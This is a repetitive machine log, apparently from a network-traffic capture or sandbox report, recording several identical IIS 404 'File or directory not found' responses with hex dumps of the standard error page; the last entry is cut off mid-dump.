    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:30:07 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:30:17 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:30:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:30:37 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:30:47 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:30:58 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:31:08 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 